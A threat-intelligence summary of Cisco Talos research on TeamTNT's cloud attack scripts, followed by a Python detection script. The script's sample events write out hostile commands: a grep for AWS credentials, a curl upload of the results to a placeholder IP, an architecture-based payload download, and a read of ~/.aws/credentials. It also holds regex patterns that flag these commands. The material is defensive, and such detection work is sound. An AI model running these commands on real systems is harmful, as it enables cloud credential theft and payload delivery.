2022-04-26

TeamTNT Scripts

Level: Tactical  |  Source: CiscoTalos  |  Cybersecurity

Cisco Talos has examined a number of script files used by the threat group TeamTNT against AWS and Alibaba Cloud environments. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. Their capabilities vary: they can initiate cryptocurrency mining, gather credentials, download additional payloads, modify file permissions, disable security tools, and achieve persistence and lateral movement. One AWS credential discovery and theft script, "GRABBER_aws_cloud.sh", searches the host's filesystem for files containing the string "AWS"; when matches are found, the script writes the results to a file, exfiltrates that file, and then deletes it. Scripts that download payloads often check the system's architecture first so that a compatible payload is fetched for execution.

TeamTNT is quite proficient in the cloud space. Beyond its abundance of robust scripts, the group has adopted techniques, observed by Trend Micro, Cado Security, and Cisco Talos, to disable cloud security agents and cloud logging. While agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted, Cisco Talos noted some omissions: "TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools."
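As an added example (not code from the Talos report or from this page), the following Python sketch shows detection logic for the three behaviours summarised above, run over constructed process-execution events of the kind an EDR or auditd pipeline emits: a file-content search for AWS credential material, a download whose URL depends on the machine architecture, and the grabber's stage, upload, delete sequence correlated within one session. The event field names, the sample command lines and IP addresses, and the credential-file path and key-name indicators beyond the literal string "AWS" are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (process-execution events); not real TeamTNT
# output. IP addresses are from documentation ranges.
SAMPLE_EVENTS = [
    {"session": "s1", "ts": 1, "cmd": "grep -rIl 'AWS' /root /home > /tmp/.aws_hits.txt"},
    {"session": "s1", "ts": 2, "cmd": "curl -s -X POST --data-binary @/tmp/.aws_hits.txt http://198.51.100.7/in"},
    {"session": "s1", "ts": 3, "cmd": "rm -f /tmp/.aws_hits.txt"},
    {"session": "s2", "ts": 4, "cmd": "curl -fsSL http://203.0.113.9/bin/$(uname -m)/x -o /tmp/x"},
    {"session": "s3", "ts": 5, "cmd": "grep -rn 'TODO' /srv/app"},   # benign search, must not fire
    {"session": "s4", "ts": 6, "cmd": "cat ~/.aws/credentials"},
]

# Rule 1: a file-content search or read aimed at AWS credential material.
# The Talos write-up describes the grabber searching for the literal string "AWS";
# the credential file path and key-name variants are added here as assumptions.
CRED_HUNT = re.compile(
    r"\b(grep|egrep|rg|find|cat|strings)\b.*?"
    r"(\bAWS\b|aws_access_key|aws_secret_access_key|\.aws/credentials)",
    re.IGNORECASE,
)

# Rule 2: a download whose URL or arguments are derived from the machine architecture.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
ARCH_PROBE = re.compile(r"uname -m|\$\(arch\)|`arch`")

# Rule 3 helpers: stage (shell redirect to a file), upload (file argument to
# curl/wget), delete (rm). The chain is tracked per session, in order.
REDIRECT = re.compile(r">{1,2}\s*(\S+)")
UPLOAD = re.compile(r"(?:@|--post-file=|--upload-file\s+|-T\s+)(\S+)")
REMOVE = re.compile(r"\brm\b(.*)")


def detect(events):
    """Return findings for the single-command rules and for the per-session
    stage -> upload -> delete chain, in timestamp order."""
    findings = []
    staged = defaultdict(dict)  # session -> {path: "staged" | "uploaded"}
    for ev in sorted(events, key=lambda e: e["ts"]):
        sess, cmd = ev["session"], ev["cmd"]
        if CRED_HUNT.search(cmd):
            findings.append({"session": sess, "ts": ev["ts"], "rule": "credential_hunt", "cmd": cmd})
        if DOWNLOADER.search(cmd) and ARCH_PROBE.search(cmd):
            findings.append({"session": sess, "ts": ev["ts"], "rule": "arch_conditional_download", "cmd": cmd})
        # Chain tracking: each step only advances if the previous step was seen
        # for the same path in the same session.
        for path in REDIRECT.findall(cmd):
            staged[sess][path] = "staged"
        m = UPLOAD.search(cmd)
        if m and staged[sess].get(m.group(1)) == "staged":
            staged[sess][m.group(1)] = "uploaded"
        m = REMOVE.search(cmd)
        if m:
            for path in (t for t in m.group(1).split() if not t.startswith("-")):
                if staged[sess].pop(path, None) == "uploaded":
                    findings.append({"session": sess, "ts": ev["ts"], "rule": "stage_exfil_cleanup", "path": path})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The single-command rules are deliberately loose (a developer searching a repository for "aws" will trigger rule 1), so in practice they belong in a correlation with the chain rule or with a process ancestry check; the chain rule alone is the higher-fidelity signal, since a staged file that is uploaded and then removed in the same session has few legitimate explanations on a production host.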
